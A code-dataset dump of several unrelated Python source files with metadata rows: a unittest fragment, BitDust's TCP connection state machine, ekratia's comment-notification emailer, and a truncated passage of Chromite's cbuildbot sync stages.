def test_date_stamp_today(self):
# Verify that date_stamp() returns the correct value for today's
# date.
self.assertEqual(self.api.date_stamp('today'), datetime.datetime.now().strftime('%Y-%m-%d'))
def test_invalid_date_stamp(self):
# Verify that date_stamp() reacts appropriately to an invalid
# date-string (it should return today's date).
self.assertEqual(self.api.date_stamp('wrong'), datetime.datetime.now().strftime('%Y-%m-%d'))
def test_portable_path(self):
# Verify that portable_path() returns the actual path to the
# Python script.
script_path = os.getcwd()
self.assertEqual(self.api.portable_path(), script_path)
def test_prepare_file(self):
# Verify that prepare_file() results in an empty contents list.
self.api.prepare_file()
self.assertEqual(self.api.contents, [])
def test_save_file(self):
# Verify that save_file() creates a file
self.api.add_line("2015-12-10", "This is a test")
self.api.save_file()
unittest.main()
|
mit
| 3,204,859,210,727,376,000 | 44.755682 | 105 | 0.56302 | false |
vesellov/bitdust.devel
|
transport/tcp/tcp_connection.py
|
1
|
16191
|
#!/usr/bin/env python
# tcp_connection.py
#
# Copyright (C) 2008-2018 Veselin Penev, https://bitdust.io
#
# This file (tcp_connection.py) is part of BitDust Software.
#
# BitDust is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# BitDust Software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with BitDust Software. If not, see <http://www.gnu.org/licenses/>.
#
# Please contact us if you have any questions at bitdust.io@gmail.com
"""
.. module:: tcp_connection.
.. role:: red
BitDust tcp_connection() Automat
EVENTS:
* :red:`connection-lost`
* :red:`connection-made`
* :red:`data-received`
* :red:`disconnect`
* :red:`send-keep-alive`
* :red:`timer-10sec`
"""
#------------------------------------------------------------------------------
from __future__ import absolute_import
#------------------------------------------------------------------------------
_Debug = True
_DebugLevel = 8
#------------------------------------------------------------------------------
import os
import time
from twisted.protocols import basic
#------------------------------------------------------------------------------
from logs import lg
from automats import automat
from lib import strng
from lib import net_misc
#------------------------------------------------------------------------------
MAX_SIMULTANEOUS_CONNECTIONS = 250
CMD_HELLO = b'h'
CMD_WAZAP = b'w'
CMD_DATA = b'd'
CMD_OK = b'o'
CMD_ABORT = b'a'
CMD_LIST = [CMD_HELLO, CMD_WAZAP, CMD_DATA, CMD_OK, CMD_ABORT, ]
#------------------------------------------------------------------------------
class TCPConnection(automat.Automat, basic.Int32StringReceiver):
SoftwareVersion = b'1'
timers = {
'timer-10sec': (10.0, ['CLIENT?', 'SERVER?']),
}
def __init__(self):
self.stream = None
self.peer_address = None
self.peer_external_address = None
self.peer_idurl = None
self.total_bytes_received = 0
self.total_bytes_sent = 0
self.outboxQueue = []
self.last_wazap_received = 0
def connectionMade(self):
if _Debug:
lg.out(_DebugLevel, 'tcp_connection.connectionMade %s' % net_misc.pack_address(self.getTransportAddress()))
address = self.getAddress()
name = 'tcp_connection[%s]' % strng.to_text(net_misc.pack_address(address))
automat.Automat.__init__(
self, name, 'AT_STARTUP',
debug_level=_DebugLevel, log_events=_Debug, publish_events=False)
self.log_transitions = _Debug
self.automat('connection-made')
def connectionLost(self, reason):
if _Debug:
lg.out(_DebugLevel, 'tcp_connection.connectionLost with %s' % net_misc.pack_address(self.getTransportAddress()))
self.automat('connection-lost')
def init(self):
"""
Method to initialize additional variables and flags at creation of the
state machine.
"""
def A(self, event, arg):
#---AT_STARTUP---
if self.state == 'AT_STARTUP':
if event == 'connection-made' and not self.isOutgoing(arg):
self.state = 'SERVER?'
self.doInit(arg)
elif event == 'connection-made' and self.isOutgoing(arg):
self.state = 'CLIENT?'
self.doInit(arg)
self.doCloseOutgoing(arg)
self.doSendHello(arg)
#---CONNECTED---
elif self.state == 'CONNECTED':
if event == 'data-received':
self.doReceiveData(arg)
elif event == 'connection-lost':
self.state = 'CLOSED'
self.doStopInOutFiles(arg)
self.doCloseStream(arg)
self.doDestroyMe(arg)
elif event == 'disconnect':
self.state = 'DISCONNECT'
self.doStopInOutFiles(arg)
self.doCloseStream(arg)
self.doDisconnect(arg)
elif event == 'send-keep-alive':
self.doSendWazap(arg)
#---CLIENT?---
elif self.state == 'CLIENT?':
if event == 'connection-lost':
self.state = 'CLOSED'
self.doDestroyMe(arg)
elif event == 'data-received' and self.isWazap(arg) and self.isSomePendingFiles(arg):
self.state = 'CONNECTED'
self.doReadWazap(arg)
self.doOpenStream(arg)
self.doStartPendingFiles(arg)
elif event == 'timer-10sec' or event == 'disconnect' or ( event == 'data-received' and not ( self.isWazap(arg) and self.isSomePendingFiles(arg) ) ):
self.state = 'DISCONNECT'
self.doDisconnect(arg)
#---SERVER?---
elif self.state == 'SERVER?':
if event == 'connection-lost':
self.state = 'CLOSED'
self.doDestroyMe(arg)
elif event == 'data-received' and self.isHello(arg):
self.state = 'CONNECTED'
self.doReadHello(arg)
self.doSendWazap(arg)
self.doOpenStream(arg)
self.doStartPendingFiles(arg)
elif event == 'timer-10sec' or event == 'disconnect' or ( event == 'data-received' and not self.isHello(arg) ):
self.state = 'DISCONNECT'
self.doDisconnect(arg)
#---CLOSED---
elif self.state == 'CLOSED':
pass
#---DISCONNECT---
elif self.state == 'DISCONNECT':
if event == 'connection-lost':
self.state = 'CLOSED'
self.doDestroyMe(arg)
return None
def isHello(self, arg):
"""
Condition method.
"""
try:
command, payload = arg
peeraddress, peeridurl = payload.split(b' ')
peerip, peerport = peeraddress.split(b':')
peerport = int(peerport)
peeraddress = (peerip, peerport)
except:
return False
return command == CMD_HELLO
def isWazap(self, arg):
"""
Condition method.
"""
try:
command, payload = arg
except:
return False
return command == CMD_WAZAP
def isOutgoing(self, arg):
"""
Condition method.
"""
from transport.tcp import tcp_node
if self.getConnectionAddress() is not None:
if self.getConnectionAddress() in list(tcp_node.started_connections().keys()):
return True
return False
def isSomePendingFiles(self, arg):
"""
Condition method.
"""
return len(self.factory.pendingoutboxfiles) > 0
def doInit(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_node
self.peer_address = self.getTransportAddress()
self.peer_external_address = self.peer_address
self.connected = time.time()
if self.peer_address not in tcp_node.opened_connections():
tcp_node.opened_connections()[self.peer_address] = []
tcp_node.opened_connections()[self.peer_address].append(self)
tcp_node.increase_connections_counter()
def doCloseOutgoing(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_node
conn = tcp_node.started_connections().pop(self.getConnectionAddress())
conn.connector = None
# lg.out(18, 'tcp_connection.doCloseOutgoing %s closed, %d more started' % (
# str(self.peer_address), len(tcp_node.started_connections())))
def doReadHello(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_node
try:
command, payload = arg
peeraddress, peeridurl = payload.split(b' ')
peerip, peerport = peeraddress.split(b':')
peerport = int(peerport)
peeraddress = (peerip, peerport)
except:
return
# self.peer_external_address = (self.peer_external_address[0], peerport)
self.peer_external_address = peeraddress
self.peer_idurl = peeridurl
if self.peer_address != self.peer_external_address:
tcp_node.opened_connections()[self.peer_address].remove(self)
if len(tcp_node.opened_connections()[self.peer_address]) == 0:
tcp_node.opened_connections().pop(self.peer_address)
self.peer_address = self.peer_external_address
if self.peer_address not in tcp_node.opened_connections():
tcp_node.opened_connections()[self.peer_address] = []
tcp_node.opened_connections()[self.peer_address].append(self)
lg.out(6, '%s : external peer address changed to %s' % (
self, self.peer_address))
# lg.out(18, 'tcp_connection.doReadHello from %s' % (self.peer_idurl))
def doReadWazap(self, arg):
"""
Action method.
"""
try:
command, payload = arg
except:
return
self.peer_idurl = payload
# lg.out(18, 'tcp_connection.doReadWazap from %s' % (self.peer_idurl))
def doReceiveData(self, arg):
"""
Action method.
"""
try:
command, payload = arg
except:
return
if command == CMD_DATA:
self.stream.data_received(payload)
elif command == CMD_OK:
self.stream.ok_received(payload)
elif command == CMD_ABORT:
self.stream.abort_received(payload)
elif command == CMD_WAZAP:
self.last_wazap_received = time.time()
else:
pass
def doSendHello(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_node
host = strng.to_bin(tcp_node.my_host() or '127.0.0.1:7771')
idurl = strng.to_bin(tcp_node.my_idurl() or 'None')
payload = host + b' ' + idurl
self.sendData(CMD_HELLO, payload)
def doSendWazap(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_node
payload = strng.to_bin(tcp_node.my_idurl() or 'None')
self.sendData(CMD_WAZAP, payload)
def doStartPendingFiles(self, arg):
"""
Action method.
"""
for filename, description, result_defer, keep_alive in self.factory.pendingoutboxfiles:
self.append_outbox_file(filename, description, result_defer, keep_alive)
self.factory.pendingoutboxfiles = []
def doStopInOutFiles(self, arg):
"""
Action method.
"""
self.stream.abort_files('disconnecting')
def doOpenStream(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_stream
self.stream = tcp_stream.TCPFileStream(self)
def doCloseStream(self, arg):
"""
Action method.
"""
self.stream.close()
del self.stream
self.stream = None
def doDisconnect(self, arg):
"""
Action method.
"""
if _Debug:
lg.out(_DebugLevel, 'tcp_connection.doDisconnect with %s' % str(self.peer_address))
try:
self.transport.stopListening()
except:
try:
self.transport.loseConnection()
except:
lg.exc()
def doDestroyMe(self, arg):
"""
Action method.
"""
from transport.tcp import tcp_node
# lg.out(18, 'tcp_connection.doDestroyMe %s' % str(self))
self.destroy()
if self.peer_address in tcp_node.opened_connections():
tcp_node.opened_connections()[self.peer_address].remove(self)
if len(tcp_node.opened_connections()[self.peer_address]) == 0:
tcp_node.opened_connections().pop(self.peer_address)
tcp_node.decrease_connections_counter()
else:
raise Exception('not found %s in the opened connections' % self.peer_address)
self.stream = None
self.peer_address = None
self.peer_external_address = None
self.peer_idurl = None
self.outboxQueue = []
def getTransportAddress(self):
peer = self.transport.getPeer()
return net_misc.normalize_address((peer.host, int(peer.port), ))
def getConnectionAddress(self):
return net_misc.normalize_address(self.factory.connection_address)
def getAddress(self):
addr = self.getConnectionAddress()
if not addr:
addr = self.getTransportAddress()
return net_misc.normalize_address(addr)
def sendData(self, command, payload):
try:
data = self.SoftwareVersion + strng.to_bin(command.lower()[0:1]) + strng.to_bin(payload)
self.sendString(data)
except:
lg.exc()
return False
self.automat('data-sent', data)
return True
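    # Hedged illustration of the framing sendData()/stringReceived() agree on:
    # each Int32StringReceiver frame carries one software-version byte, one
    # command byte and the raw payload, so for example
    # sendData(CMD_WAZAP, b'http://id-server/alice.xml') puts
    # b'1' + b'w' + b'http://id-server/alice.xml' on the wire, prefixed by the
    # 4-byte length header that Int32StringReceiver adds.
    # The identity URL above is a placeholder.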
def stringReceived(self, data):
try:
version = data[0:1]
command = data[1:2]
payload = data[2:]
if version != self.SoftwareVersion:
raise Exception('different software version')
if command not in CMD_LIST:
raise Exception('unknown command received')
except:
lg.warn('invalid string received in tcp connection')
try:
self.transport.stopListening()
except:
try:
self.transport.loseConnection()
except:
lg.exc()
return
self.automat('data-received', (command, payload))
def append_outbox_file(self, filename, description='', result_defer=None, keep_alive=True):
self.outboxQueue.append((filename, description, result_defer, keep_alive))
def process_outbox_queue(self):
if self.state != 'CONNECTED':
return False
if self.stream is None:
return False
from transport.tcp import tcp_stream
has_reads = False
while len(self.outboxQueue) > 0 and len(self.stream.outboxFiles) < tcp_stream.MAX_SIMULTANEOUS_OUTGOING_FILES:
filename, description, result_defer, keep_alive = self.outboxQueue.pop(0)
has_reads = True
# we have a queue of files to be sent
            # a file may have been removed after it was queued but before we
            # start sending it, so check here and skip files that no longer exist
if not os.path.isfile(filename):
self.failed_outbox_queue_item(filename, description, 'file not exist')
if not keep_alive:
self.automat('shutdown')
continue
try:
filesize = os.path.getsize(filename)
except:
self.failed_outbox_queue_item(filename, description, 'can not get file size')
if not keep_alive:
self.automat('shutdown')
continue
self.stream.create_outbox_file(filename, filesize, description, result_defer, keep_alive)
return has_reads
def failed_outbox_queue_item(self, filename, description='', error_message=''):
from transport.tcp import tcp_interface
lg.out(6, 'tcp_connection.failed_outbox_queue_item %s because %s' % (filename, error_message))
try:
tcp_interface.interface_cancelled_file_sending(
self.getAddress(), filename, 0, description, error_message).addErrback(lambda err: lg.exc(err))
except Exception as exc:
lg.warn(str(exc))
|
agpl-3.0
| -3,884,063,711,890,305,000 | 33.819355 | 160 | 0.556173 | false |
andresgz/ekratia
|
ekratia/core/email.py
|
1
|
2332
|
from ekratia.conversations.models import Thread
from ekratia.referendums.models import Referendum
from django_email import EmailTemplate
import logging
logger = logging.getLogger('ekratia')
def notify_comment_node(request, node, object_type):
"""
Method to create new comment for the current Thread
"""
root = node.get_root()
# Find Referendum or Conversation
object = None
if object_type == 'referendum':
try:
object = Referendum.objects.get(comment=root)
object_type = 'referendum'
except Referendum.DoesNotExist:
object = None
elif object_type == 'conversation':
try:
object = Thread.objects.get(comment=root)
object_type = 'conversation'
except Thread.DoesNotExist:
object = None
if not object:
return False
# Count and save comments of the object
# TODO: count and update comments
object.count_comments()
# Send message to parent comment user
try:
mail = EmailTemplate("comment_node")
mail.context = {'comment': request.data,
'user': request.user,
'request': request,
'you': node.user,
'object': object,
'object_type': object_type
}
mail.set_subject('%s replied your comment on %s'
% (request.user.get_full_name_or_username,
object.title))
if request.user != node.user:
mail.send_to_user(node.user)
    except ValueError as e:
logger.error("Could not send email %s" % e)
# Send message to owner
try:
mail = EmailTemplate("comment_root")
mail.context = {'comment': request.data,
'user': request.user,
'request': request,
'you': root.user,
'object': object,
'object_type': object_type
}
mail.set_subject('%s has a new comment' % object.title)
if request.user != root.user and node.user != root.user:
mail.send_to_user(root.user)
    except ValueError as e:
logger.error("Could not send email %s" % e)
|
bsd-3-clause
| -1,448,053,471,273,552,600 | 31.388889 | 67 | 0.542453 | false |
chadversary/chromiumos.chromite
|
cbuildbot/stages/sync_stages.py
|
1
|
40929
|
# Copyright (c) 2013 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Module containing the sync stages."""
import contextlib
import datetime
import logging
import os
import sys
from xml.etree import ElementTree
from xml.dom import minidom
from chromite.cbuildbot import cbuildbot_config
from chromite.cbuildbot import failures_lib
from chromite.cbuildbot import constants
from chromite.cbuildbot import lkgm_manager
from chromite.cbuildbot import manifest_version
from chromite.cbuildbot import repository
from chromite.cbuildbot import tree_status
from chromite.cbuildbot import trybot_patch_pool
from chromite.cbuildbot import validation_pool
from chromite.cbuildbot.stages import generic_stages
from chromite.cbuildbot.stages import build_stages
from chromite.lib import commandline
from chromite.lib import cros_build_lib
from chromite.lib import gclient
from chromite.lib import git
from chromite.lib import osutils
from chromite.lib import patch as cros_patch
from chromite.scripts import cros_mark_chrome_as_stable
PRE_CQ = validation_pool.PRE_CQ
class PatchChangesStage(generic_stages.BuilderStage):
"""Stage that patches a set of Gerrit changes to the buildroot source tree."""
def __init__(self, builder_run, patch_pool, **kwargs):
"""Construct a PatchChangesStage.
Args:
builder_run: BuilderRun object.
patch_pool: A TrybotPatchPool object containing the different types of
patches to apply.
"""
super(PatchChangesStage, self).__init__(builder_run, **kwargs)
self.patch_pool = patch_pool
@staticmethod
def _CheckForDuplicatePatches(_series, changes):
conflicts = {}
duplicates = []
for change in changes:
if change.id is None:
cros_build_lib.Warning(
"Change %s lacks a usable ChangeId; duplicate checking cannot "
"be done for this change. If cherry-picking fails, this is a "
"potential cause.", change)
continue
conflicts.setdefault(change.id, []).append(change)
duplicates = [x for x in conflicts.itervalues() if len(x) > 1]
if not duplicates:
return changes
for conflict in duplicates:
cros_build_lib.Error(
"Changes %s conflict with each other- they have same id %s.",
', '.join(map(str, conflict)), conflict[0].id)
cros_build_lib.Die("Duplicate patches were encountered: %s", duplicates)
def _PatchSeriesFilter(self, series, changes):
return self._CheckForDuplicatePatches(series, changes)
def _ApplyPatchSeries(self, series, patch_pool, **kwargs):
"""Applies a patch pool using a patch series."""
kwargs.setdefault('frozen', False)
# Honor the given ordering, so that if a gerrit/remote patch
# conflicts w/ a local patch, the gerrit/remote patch are
# blamed rather than local (patch ordering is typically
# local, gerrit, then remote).
kwargs.setdefault('honor_ordering', True)
kwargs['changes_filter'] = self._PatchSeriesFilter
_applied, failed_tot, failed_inflight = series.Apply(
list(patch_pool), **kwargs)
failures = failed_tot + failed_inflight
if failures:
self.HandleApplyFailures(failures)
def HandleApplyFailures(self, failures):
cros_build_lib.Die("Failed applying patches: %s",
"\n".join(map(str, failures)))
def PerformStage(self):
class NoisyPatchSeries(validation_pool.PatchSeries):
"""Custom PatchSeries that adds links to buildbot logs for remote trys."""
def ApplyChange(self, change):
if isinstance(change, cros_patch.GerritPatch):
cros_build_lib.PrintBuildbotLink(str(change), change.url)
elif isinstance(change, cros_patch.UploadedLocalPatch):
cros_build_lib.PrintBuildbotStepText(str(change))
return validation_pool.PatchSeries.ApplyChange(self, change)
# If we're an external builder, ignore internal patches.
helper_pool = validation_pool.HelperPool.SimpleCreate(
cros_internal=self._run.config.internal, cros=True)
# Limit our resolution to non-manifest patches.
patch_series = NoisyPatchSeries(
self._build_root,
helper_pool=helper_pool,
deps_filter_fn=lambda p: not trybot_patch_pool.ManifestFilter(p))
self._ApplyPatchSeries(patch_series, self.patch_pool)
class BootstrapStage(PatchChangesStage):
"""Stage that patches a chromite repo and re-executes inside it.
Attributes:
returncode - the returncode of the cbuildbot re-execution. Valid after
calling stage.Run().
"""
option_name = 'bootstrap'
def __init__(self, builder_run, chromite_patch_pool,
manifest_patch_pool=None, **kwargs):
super(BootstrapStage, self).__init__(
builder_run, trybot_patch_pool.TrybotPatchPool(), **kwargs)
self.chromite_patch_pool = chromite_patch_pool
self.manifest_patch_pool = manifest_patch_pool
self.returncode = None
def _ApplyManifestPatches(self, patch_pool):
"""Apply a pool of manifest patches to a temp manifest checkout.
Args:
patch_pool: The pool to apply.
Returns:
The path to the patched manifest checkout.
Raises:
Exception, if the new patched manifest cannot be parsed.
"""
checkout_dir = os.path.join(self.tempdir, 'manfest-checkout')
repository.CloneGitRepo(checkout_dir,
self._run.config.manifest_repo_url)
patch_series = validation_pool.PatchSeries.WorkOnSingleRepo(
checkout_dir, tracking_branch=self._run.manifest_branch)
self._ApplyPatchSeries(patch_series, patch_pool)
# Create the branch that 'repo init -b <target_branch> -u <patched_repo>'
# will look for.
cmd = ['branch', '-f', self._run.manifest_branch,
constants.PATCH_BRANCH]
git.RunGit(checkout_dir, cmd)
# Verify that the patched manifest loads properly. Propagate any errors as
# exceptions.
manifest = os.path.join(checkout_dir, self._run.config.manifest)
git.Manifest.Cached(manifest, manifest_include_dir=checkout_dir)
return checkout_dir
@staticmethod
def _FilterArgsForApi(parsed_args, api_minor):
"""Remove arguments that are introduced after an api version."""
def filter_fn(passed_arg):
return passed_arg.opt_inst.api_version <= api_minor
accepted, removed = commandline.FilteringParser.FilterArgs(
parsed_args, filter_fn)
if removed:
cros_build_lib.Warning('The following arguments were removed due to api: '
"'%s'" % ' '.join(removed))
return accepted
@classmethod
def FilterArgsForTargetCbuildbot(cls, buildroot, cbuildbot_path, options):
_, minor = cros_build_lib.GetTargetChromiteApiVersion(buildroot)
args = [cbuildbot_path]
args.extend(options.build_targets)
args.extend(cls._FilterArgsForApi(options.parsed_args, minor))
# Only pass down --cache-dir if it was specified. By default, we want
# the cache dir to live in the root of each checkout, so this means that
# each instance of cbuildbot needs to calculate the default separately.
if minor >= 2 and options.cache_dir_specified:
args += ['--cache-dir', options.cache_dir]
return args
def HandleApplyFailures(self, failures):
"""Handle the case where patches fail to apply."""
if self._run.options.pre_cq or self._run.config.pre_cq:
# Let the PreCQSync stage handle this failure. The PreCQSync stage will
# comment on CLs with the appropriate message when they fail to apply.
#
# WARNING: For manifest patches, the Pre-CQ attempts to apply external
# patches to the internal manifest, and this means we may flag a conflict
# here even if the patch applies cleanly. TODO(davidjames): Fix this.
cros_build_lib.PrintBuildbotStepWarnings()
cros_build_lib.Error('Failed applying patches: %s',
'\n'.join(map(str, failures)))
else:
PatchChangesStage.HandleApplyFailures(self, failures)
#pylint: disable=E1101
@osutils.TempDirDecorator
def PerformStage(self):
# The plan for the builders is to use master branch to bootstrap other
# branches. Now, if we wanted to test patches for both the bootstrap code
# (on master) and the branched chromite (say, R20), we need to filter the
# patches by branch.
filter_branch = self._run.manifest_branch
if self._run.options.test_bootstrap:
filter_branch = 'master'
chromite_dir = os.path.join(self.tempdir, 'chromite')
reference_repo = os.path.join(constants.SOURCE_ROOT, 'chromite', '.git')
repository.CloneGitRepo(chromite_dir, constants.CHROMITE_URL,
reference=reference_repo)
git.RunGit(chromite_dir, ['checkout', filter_branch])
def BranchAndChromiteFilter(patch):
return (trybot_patch_pool.BranchFilter(filter_branch, patch) and
trybot_patch_pool.ChromiteFilter(patch))
patch_series = validation_pool.PatchSeries.WorkOnSingleRepo(
chromite_dir, filter_branch,
deps_filter_fn=BranchAndChromiteFilter)
filtered_pool = self.chromite_patch_pool.FilterBranch(filter_branch)
if filtered_pool:
self._ApplyPatchSeries(patch_series, filtered_pool)
cbuildbot_path = constants.PATH_TO_CBUILDBOT
if not os.path.exists(os.path.join(self.tempdir, cbuildbot_path)):
cbuildbot_path = 'chromite/cbuildbot/cbuildbot'
# pylint: disable=W0212
cmd = self.FilterArgsForTargetCbuildbot(self.tempdir, cbuildbot_path,
self._run.options)
extra_params = ['--sourceroot=%s' % self._run.options.sourceroot]
extra_params.extend(self._run.options.bootstrap_args)
if self._run.options.test_bootstrap:
# We don't want the re-executed instance to see this.
cmd = [a for a in cmd if a != '--test-bootstrap']
else:
# If we've already done the desired number of bootstraps, disable
# bootstrapping for the next execution. Also pass in the patched manifest
# repository.
extra_params.append('--nobootstrap')
if self.manifest_patch_pool:
manifest_dir = self._ApplyManifestPatches(self.manifest_patch_pool)
extra_params.extend(['--manifest-repo-url', manifest_dir])
cmd += extra_params
result_obj = cros_build_lib.RunCommand(
cmd, cwd=self.tempdir, kill_timeout=30, error_code_ok=True)
self.returncode = result_obj.returncode
class SyncStage(generic_stages.BuilderStage):
"""Stage that performs syncing for the builder."""
option_name = 'sync'
output_manifest_sha1 = True
def __init__(self, builder_run, **kwargs):
super(SyncStage, self).__init__(builder_run, **kwargs)
self.repo = None
self.skip_sync = False
# TODO(mtennant): Why keep a duplicate copy of this config value
# at self.internal when it can always be retrieved from config?
self.internal = self._run.config.internal
def _GetManifestVersionsRepoUrl(self, read_only=False):
return cbuildbot_config.GetManifestVersionsRepoUrl(
self.internal,
read_only=read_only)
def Initialize(self):
self._InitializeRepo()
def _InitializeRepo(self):
"""Set up the RepoRepository object."""
self.repo = self.GetRepoRepository()
def GetNextManifest(self):
"""Returns the manifest to use."""
return self._run.config.manifest
def ManifestCheckout(self, next_manifest):
"""Checks out the repository to the given manifest."""
self._Print('\n'.join(['BUILDROOT: %s' % self.repo.directory,
'TRACKING BRANCH: %s' % self.repo.branch,
'NEXT MANIFEST: %s' % next_manifest]))
if not self.skip_sync:
self.repo.Sync(next_manifest)
print >> sys.stderr, self.repo.ExportManifest(
mark_revision=self.output_manifest_sha1)
def RunPrePatchBuild(self):
"""Run through a pre-patch build to prepare for incremental build.
This function runs through the InitSDKStage, SetupBoardStage, and
BuildPackagesStage. It is intended to be called before applying
any patches under test, to prepare the chroot and sysroot in a state
corresponding to ToT prior to an incremental build.
Returns:
True if all stages were successful, False if any of them failed.
"""
suffix = ' (pre-Patch)'
try:
build_stages.InitSDKStage(
self._run, chroot_replace=True, suffix=suffix).Run()
for builder_run in self._run.GetUngroupedBuilderRuns():
for board in builder_run.config.boards:
build_stages.SetupBoardStage(
builder_run, board=board, suffix=suffix).Run()
build_stages.BuildPackagesStage(
builder_run, board=board, suffix=suffix).Run()
except failures_lib.StepFailure:
return False
return True
@failures_lib.SetFailureType(failures_lib.InfrastructureFailure)
def PerformStage(self):
self.Initialize()
with osutils.TempDir() as tempdir:
# Save off the last manifest.
fresh_sync = True
if os.path.exists(self.repo.directory) and not self._run.options.clobber:
old_filename = os.path.join(tempdir, 'old.xml')
try:
old_contents = self.repo.ExportManifest()
except cros_build_lib.RunCommandError as e:
cros_build_lib.Warning(str(e))
else:
osutils.WriteFile(old_filename, old_contents)
fresh_sync = False
# Sync.
self.ManifestCheckout(self.GetNextManifest())
# Print the blamelist.
if fresh_sync:
cros_build_lib.PrintBuildbotStepText('(From scratch)')
elif self._run.options.buildbot:
lkgm_manager.GenerateBlameList(self.repo, old_filename)
# Incremental builds request an additional build before patching changes.
if self._run.config.build_before_patching:
pre_build_passed = self.RunPrePatchBuild()
if not pre_build_passed:
cros_build_lib.PrintBuildbotStepText('Pre-patch build failed.')
class LKGMSyncStage(SyncStage):
"""Stage that syncs to the last known good manifest blessed by builders."""
output_manifest_sha1 = False
def GetNextManifest(self):
"""Override: Gets the LKGM."""
# TODO(sosa): Should really use an initialized manager here.
if self.internal:
mv_dir = 'manifest-versions-internal'
else:
mv_dir = 'manifest-versions'
manifest_path = os.path.join(self._build_root, mv_dir)
manifest_repo = self._GetManifestVersionsRepoUrl(read_only=True)
manifest_version.RefreshManifestCheckout(manifest_path, manifest_repo)
return os.path.join(manifest_path, lkgm_manager.LKGMManager.LKGM_PATH)
class ManifestVersionedSyncStage(SyncStage):
"""Stage that generates a unique manifest file, and sync's to it."""
# TODO(mtennant): Make this into a builder run value.
output_manifest_sha1 = False
def __init__(self, builder_run, **kwargs):
# Perform the sync at the end of the stage to the given manifest.
super(ManifestVersionedSyncStage, self).__init__(builder_run, **kwargs)
self.repo = None
self.manifest_manager = None
# If a builder pushes changes (even with dryrun mode), we need a writable
# repository. Otherwise, the push will be rejected by the server.
self.manifest_repo = self._GetManifestVersionsRepoUrl(read_only=False)
# 1. If we're uprevving Chrome, Chrome might have changed even if the
# manifest has not, so we should force a build to double check. This
# means that we'll create a new manifest, even if there are no changes.
# 2. If we're running with --debug, we should always run through to
# completion, so as to ensure a complete test.
self._force = self._chrome_rev or self._run.options.debug
def HandleSkip(self):
"""Initializes a manifest manager to the specified version if skipped."""
super(ManifestVersionedSyncStage, self).HandleSkip()
if self._run.options.force_version:
self.Initialize()
self.ForceVersion(self._run.options.force_version)
def ForceVersion(self, version):
"""Creates a manifest manager from given version and returns manifest."""
cros_build_lib.PrintBuildbotStepText(version)
return self.manifest_manager.BootstrapFromVersion(version)
def VersionIncrementType(self):
"""Return which part of the version number should be incremented."""
if self._run.manifest_branch == 'master':
return 'build'
return 'branch'
def RegisterManifestManager(self, manifest_manager):
"""Save the given manifest manager for later use in this run.
Args:
manifest_manager: Expected to be a BuildSpecsManager.
"""
self._run.attrs.manifest_manager = self.manifest_manager = manifest_manager
def Initialize(self):
"""Initializes a manager that manages manifests for associated stages."""
dry_run = self._run.options.debug
self._InitializeRepo()
# If chrome_rev is somehow set, fail.
assert not self._chrome_rev, \
'chrome_rev is unsupported on release builders.'
self.RegisterManifestManager(manifest_version.BuildSpecsManager(
source_repo=self.repo,
manifest_repo=self.manifest_repo,
manifest=self._run.config.manifest,
build_names=self._run.GetBuilderIds(),
incr_type=self.VersionIncrementType(),
force=self._force,
branch=self._run.manifest_branch,
dry_run=dry_run,
master=self._run.config.master))
def _SetChromeVersionIfApplicable(self, manifest):
"""If 'chrome' is in |manifest|, write the version to the BuilderRun object.
Args:
manifest: Path to the manifest.
"""
manifest_dom = minidom.parse(manifest)
elements = manifest_dom.getElementsByTagName(lkgm_manager.CHROME_ELEMENT)
if elements:
chrome_version = elements[0].getAttribute(
lkgm_manager.CHROME_VERSION_ATTR)
logging.info(
'Chrome version was found in the manifest: %s', chrome_version)
# Update the metadata dictionary. This is necessary because the
# metadata dictionary is preserved through re-executions, so
# SyncChromeStage can read the version from the dictionary
# later. This is easier than parsing the manifest again after
# the re-execution.
self._run.attrs.metadata.UpdateKeyDictWithDict(
'version', {'chrome': chrome_version})
def GetNextManifest(self):
"""Uses the initialized manifest manager to get the next manifest."""
assert self.manifest_manager, \
'Must run Initialize before checking out a build.'
to_return = self.manifest_manager.GetNextBuildSpec(
dashboard_url=self.ConstructDashboardURL())
previous_version = self.manifest_manager.GetLatestPassingSpec()
target_version = self.manifest_manager.current_version
# Print the Blamelist here.
url_prefix = 'http://chromeos-images.corp.google.com/diff/report?'
url = url_prefix + 'from=%s&to=%s' % (previous_version, target_version)
cros_build_lib.PrintBuildbotLink('Blamelist', url)
# The testManifestVersionedSyncOnePartBranch interacts badly with this
# function. It doesn't fully initialize self.manifest_manager which
# causes target_version to be None. Since there isn't a clean fix in
# either direction, just throw this through str(). In the normal case,
it's already a string anyway.
cros_build_lib.PrintBuildbotStepText(str(target_version))
return to_return
@contextlib.contextmanager
def LocalizeManifest(self, manifest, filter_cros=False):
"""Remove restricted checkouts from the manifest if needed.
Args:
manifest: The manifest to localize.
filter_cros: If set, then only checkouts with a remote of 'cros' or
'cros-internal' are kept, and the rest are filtered out.
"""
if filter_cros:
with osutils.TempDir() as tempdir:
filtered_manifest = os.path.join(tempdir, 'filtered.xml')
doc = ElementTree.parse(manifest)
root = doc.getroot()
for node in root.findall('project'):
remote = node.attrib.get('remote')
if remote and remote not in constants.GIT_REMOTES:
root.remove(node)
doc.write(filtered_manifest)
yield filtered_manifest
else:
yield manifest
@failures_lib.SetFailureType(failures_lib.InfrastructureFailure)
def PerformStage(self):
self.Initialize()
if self._run.options.force_version:
next_manifest = self.ForceVersion(self._run.options.force_version)
else:
next_manifest = self.GetNextManifest()
if not next_manifest:
cros_build_lib.Info('Found no work to do.')
if self._run.attrs.manifest_manager.DidLastBuildFail():
raise failures_lib.StepFailure('The previous build failed.')
else:
sys.exit(0)
# Log this early on for the release team to grep out before we finish.
if self.manifest_manager:
self._Print('\nRELEASETAG: %s\n' % (
self.manifest_manager.current_version))
self._SetChromeVersionIfApplicable(next_manifest)
# To keep local trybots working, remove restricted checkouts from the
